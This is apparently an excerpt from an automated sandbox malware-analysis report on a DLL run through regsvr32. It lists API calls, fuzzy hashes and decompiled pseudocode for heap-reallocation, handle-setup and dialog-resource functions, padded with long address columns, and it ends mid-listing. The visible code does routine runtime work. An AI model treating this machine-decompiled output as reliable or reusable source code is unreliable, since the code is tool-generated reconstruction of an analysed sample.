                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001472b
                                                                        0x1001472b
                                                                        0x1001472b
                                                                        0x10014732
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014738
                                                                        0x10014739
                                                                        0x1001473b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001473b
                                                                        0x10014836
                                                                        0x10014838
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001484b
                                                                        0x1001484d
                                                                        0x1001484f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014855
                                                                        0x1001485c
                                                                        0x1001488c
                                                                        0x1001488c
                                                                        0x1001488e
                                                                        0x10014890
                                                                        0x100148a4
                                                                        0x100148ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014892
                                                                        0x10014892
                                                                        0x10014892
                                                                        0x1001489b
                                                                        0x1001489c
                                                                        0x1001489e
                                                                        0x100148a0
                                                                        0x100148a0
                                                                        0x00000000
                                                                        0x10014892
                                                                        0x1001485e
                                                                        0x10014863
                                                                        0x10014863
                                                                        0x10014866
                                                                        0x10014868
                                                                        0x1001487a
                                                                        0x1001487a
                                                                        0x1001487d
                                                                        0x1001487f
                                                                        0x1001487f
                                                                        0x10014880
                                                                        0x10014880
                                                                        0x10014885
                                                                        0x10014885
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001486a
                                                                        0x1001486a
                                                                        0x1001486a
                                                                        0x10014871
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014873
                                                                        0x10014873
                                                                        0x10014874
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014874
                                                                        0x10014876
                                                                        0x10014878
                                                                        0x1001488a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001488a
                                                                        0x00000000
                                                                        0x10014878
                                                                        0x10014704
                                                                        0x10014707
                                                                        0x1001470a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014710
                                                                        0x10014712
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014712
                                                                        0x100146cf
                                                                        0x100146d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ExchangeInterlocked$QueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2947987494-0
                                                                        • Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                        • Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
                                                                        • Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                        • Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001614C Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E1001614C() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E100107B6(0x480);
				if(_t51 != 0) {
					 *0x1004f920 = _t51;
					 *0x1004f90c = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x1004f920; // 0x0
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x1004f920; // 0x0
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_push(0xfa0);
								_push( &(_t103[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x1004f90c);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x1004f90c - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_push(0xfa0);
								_push( &(_t105[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x1004f924;
						while(1) {
							_t78 = E100107B6(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x1004f90c =  *0x1004f90c + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x1004f90c - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x1004f90c; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}



























                                                                        0x10016156
                                                                        0x1001615e
                                                                        0x10016168
                                                                        0x1001616d
                                                                        0x10016177
                                                                        0x10016177
                                                                        0x1001619d
                                                                        0x1001619d
                                                                        0x1001619f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001617f
                                                                        0x10016182
                                                                        0x10016186
                                                                        0x1001618a
                                                                        0x1001618e
                                                                        0x10016194
                                                                        0x10016197
                                                                        0x10016197
                                                                        0x10016197
                                                                        0x100161a9
                                                                        0x100161af
                                                                        0x100161b5
                                                                        0x100162a4
                                                                        0x100162a4
                                                                        0x100162a4
                                                                        0x100162a6
                                                                        0x100162a6
                                                                        0x100162af
                                                                        0x100162b2
                                                                        0x100162b5
                                                                        0x10016326
                                                                        0x10016326
                                                                        0x10016326
                                                                        0x00000000
                                                                        0x10016326
                                                                        0x100162b7
                                                                        0x100162b9
                                                                        0x100162bd
                                                                        0x100162ce
                                                                        0x100162d0
                                                                        0x100162d0
                                                                        0x100162bf
                                                                        0x100162c1
                                                                        0x100162c1
                                                                        0x100162da
                                                                        0x100162dc
                                                                        0x100162df
                                                                        0x10016320
                                                                        0x10016320
                                                                        0x100162e1
                                                                        0x100162e2
                                                                        0x100162e8
                                                                        0x100162ea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100162ec
                                                                        0x100162f1
                                                                        0x100162f4
                                                                        0x100162f6
                                                                        0x100162fe
                                                                        0x10016301
                                                                        0x10016303
                                                                        0x10016303
                                                                        0x10016303
                                                                        0x10016303
                                                                        0x100162f8
                                                                        0x100162f8
                                                                        0x100162f8
                                                                        0x1001630a
                                                                        0x1001630f
                                                                        0x10016310
                                                                        0x10016315
                                                                        0x10016319
                                                                        0x100162c4
                                                                        0x100162c4
                                                                        0x10016342
                                                                        0x00000000
                                                                        0x1001631b
                                                                        0x1001631b
                                                                        0x00000000
                                                                        0x1001631b
                                                                        0x10016319
                                                                        0x1001632a
                                                                        0x1001632a
                                                                        0x1001632b
                                                                        0x1001632b
                                                                        0x1001633a
                                                                        0x10016340
                                                                        0x10016340
                                                                        0x00000000
                                                                        0x10016340
                                                                        0x100161bb
                                                                        0x100161bf
                                                                        0x100161c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100161c7
                                                                        0x100161c9
                                                                        0x100161cf
                                                                        0x100161d8
                                                                        0x100161da
                                                                        0x100161dc
                                                                        0x100161dc
                                                                        0x100161de
                                                                        0x100161e4
                                                                        0x10016234
                                                                        0x10016234
                                                                        0x10016236
                                                                        0x10016238
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001623a
                                                                        0x1001623a
                                                                        0x1001623e
                                                                        0x10016240
                                                                        0x10016243
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016245
                                                                        0x10016248
                                                                        0x1001624b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001624d
                                                                        0x10016250
                                                                        0x1001625d
                                                                        0x10016271
                                                                        0x1001627a
                                                                        0x1001627f
                                                                        0x10016285
                                                                        0x1001628a
                                                                        0x1001628b
                                                                        0x10016290
                                                                        0x10016294
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016296
                                                                        0x10016296
                                                                        0x10016296
                                                                        0x00000000
                                                                        0x10016296
                                                                        0x10016259
                                                                        0x1001625b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016299
                                                                        0x10016299
                                                                        0x1001629e
                                                                        0x1001629f
                                                                        0x100162a0
                                                                        0x100162a0
                                                                        0x00000000
                                                                        0x100161e6
                                                                        0x100161e6
                                                                        0x100161eb
                                                                        0x100161ec
                                                                        0x100161f1
                                                                        0x100161f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100161f6
                                                                        0x100161fd
                                                                        0x100161ff
                                                                        0x100161ff
                                                                        0x1001621d
                                                                        0x1001621d
                                                                        0x1001621f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016207
                                                                        0x1001620a
                                                                        0x1001620e
                                                                        0x10016212
                                                                        0x10016218
                                                                        0x1001621b
                                                                        0x1001621b
                                                                        0x1001621b
                                                                        0x10016221
                                                                        0x10016224
                                                                        0x1001622a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001622c
                                                                        0x1001622e
                                                                        0x00000000
                                                                        0x1001622e
                                                                        0x100161e4
                                                                        0x00000000

                                                                        APIs
                                                                        • GetStartupInfoA.KERNEL32(?), ref: 100161A9
                                                                        • GetFileType.KERNEL32(?), ref: 10016253
                                                                        • GetStdHandle.KERNEL32(-000000F6), ref: 100162D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleInfoStartupType
                                                                        • String ID:
                                                                        • API String ID: 2461013171-0
                                                                        • Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                        • Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
                                                                        • Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                        • Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001234F Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x10041dc0);
				E10012514(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(__eflags != 0) {
						__eflags =  *0x10050a64 - 3;
						if( *0x10050a64 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E10014676(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E10013A38(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E10013B9B(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E100124B7();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x10050a50; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E1001409B();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E1001437A();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E10011440( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E10013B9B(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E10013BC6();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E10011440( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E10013BC6();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E10014676(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E100107C8(0, _t59, _t61, __eflags);
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E100107B6( *(_t67 + 0xc));
					L37:
					return E1001254F(_t28);
				}
			}
















                                                                        0x1001234f
                                                                        0x10012351
                                                                        0x10012356
                                                                        0x1001235b
                                                                        0x10012362
                                                                        0x10012372
                                                                        0x10012375
                                                                        0x10012377
                                                                        0x10012385
                                                                        0x1001238c
                                                                        0x100124c0
                                                                        0x100124c0
                                                                        0x100124c2
                                                                        0x100124c5
                                                                        0x100124c7
                                                                        0x100124c9
                                                                        0x100124cd
                                                                        0x100124cd
                                                                        0x100124cd
                                                                        0x100124d7
                                                                        0x100124d7
                                                                        0x100124dd
                                                                        0x100124df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100124e1
                                                                        0x100124e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100124ea
                                                                        0x100124f0
                                                                        0x100124f2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100124f2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10012392
                                                                        0x10012392
                                                                        0x10012392
                                                                        0x10012395
                                                                        0x10012398
                                                                        0x1001248f
                                                                        0x1001248f
                                                                        0x10012492
                                                                        0x10012494
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10012496
                                                                        0x1001249c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001249c
                                                                        0x100123a0
                                                                        0x100123a6
                                                                        0x100123aa
                                                                        0x100123b0
                                                                        0x100123b3
                                                                        0x100123b5
                                                                        0x1001245f
                                                                        0x1001245f
                                                                        0x10012463
                                                                        0x10012468
                                                                        0x1001246b
                                                                        0x1001246d
                                                                        0x1001246f
                                                                        0x10012473
                                                                        0x10012473
                                                                        0x10012473
                                                                        0x10012477
                                                                        0x10012477
                                                                        0x1001247a
                                                                        0x1001248c
                                                                        0x1001248c
                                                                        0x00000000
                                                                        0x1001246b
                                                                        0x100123bb
                                                                        0x100123c1
                                                                        0x100123c3
                                                                        0x100123c4
                                                                        0x100123c5
                                                                        0x100123c6
                                                                        0x100123cb
                                                                        0x100123ce
                                                                        0x100123d0
                                                                        0x100123d7
                                                                        0x100123d8
                                                                        0x100123de
                                                                        0x100123e1
                                                                        0x100123e3
                                                                        0x100123e8
                                                                        0x100123e9
                                                                        0x100123ec
                                                                        0x100123ee
                                                                        0x100123f0
                                                                        0x100123f0
                                                                        0x100123f7
                                                                        0x100123fd
                                                                        0x10012402
                                                                        0x10012405
                                                                        0x10012406
                                                                        0x10012407
                                                                        0x1001240c
                                                                        0x1001240c
                                                                        0x100123d2
                                                                        0x100123d2
                                                                        0x100123d2
                                                                        0x100123d0
                                                                        0x1001240f
                                                                        0x10012412
                                                                        0x10012414
                                                                        0x10012416
                                                                        0x1001241a
                                                                        0x1001241a
                                                                        0x1001241b
                                                                        0x1001241b
                                                                        0x10012421
                                                                        0x10012424
                                                                        0x1001242f
                                                                        0x10012435
                                                                        0x10012438
                                                                        0x1001243a
                                                                        0x1001243f
                                                                        0x10012440
                                                                        0x10012443
                                                                        0x10012445
                                                                        0x10012447
                                                                        0x10012447
                                                                        0x1001244e
                                                                        0x10012453
                                                                        0x10012454
                                                                        0x10012457
                                                                        0x1001245c
                                                                        0x1001245c
                                                                        0x1001243a
                                                                        0x00000000
                                                                        0x1001249e
                                                                        0x1001249f
                                                                        0x100124a5
                                                                        0x100124a5
                                                                        0x00000000
                                                                        0x10012379
                                                                        0x10012379
                                                                        0x1001237a
                                                                        0x100124f4
                                                                        0x100124f4
                                                                        0x100124f4
                                                                        0x00000000
                                                                        0x100124f4
                                                                        0x10012364
                                                                        0x10012367
                                                                        0x100124f6
                                                                        0x100124fb
                                                                        0x100124fb

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                        • Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
                                                                        • Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                        • Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100071BF Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E100373B5() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E10006D96( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E1001F77E(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E1001E118(_t93, __eflags);
									} else {
										_push(_v12);
										E1001DF55(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E10006D96( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}



























                                                                        0x100071cd
                                                                        0x100071cf
                                                                        0x100071d2
                                                                        0x100071d5
                                                                        0x100071dc
                                                                        0x100071e8
                                                                        0x100071f0
                                                                        0x100071f4
                                                                        0x100071fc
                                                                        0x100071ff
                                                                        0x00000000
                                                                        0x10007201
                                                                        0x1000720f
                                                                        0x1000720f
                                                                        0x100071f0
                                                                        0x10007212
                                                                        0x10007215
                                                                        0x10007218
                                                                        0x1000721b
                                                                        0x10007222
                                                                        0x1000722d
                                                                        0x10007230
                                                                        0x10007234
                                                                        0x10007237
                                                                        0x1000723c
                                                                        0x1000723c
                                                                        0x10007237
                                                                        0x10007242
